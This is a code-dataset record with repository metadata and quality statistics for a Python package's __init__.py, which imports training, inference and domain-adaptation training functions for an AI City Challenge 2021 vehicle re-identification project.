| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b82614e97ecb670905d909e626237b61a660a2e
| 86
|
py
|
Python
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 74
|
2021-04-19T03:09:45.000Z
|
2022-03-29T06:32:08.000Z
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 16
|
2021-05-14T06:09:26.000Z
|
2022-02-23T20:08:27.000Z
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 18
|
2021-05-10T02:17:01.000Z
|
2022-03-27T05:18:55.000Z
|
from .processor import do_train, do_inference
from .uda_processor import do_uda_train
| 28.666667
| 45
| 0.860465
| 14
| 86
| 4.928571
| 0.5
| 0.434783
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 86
| 2
| 46
| 43
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.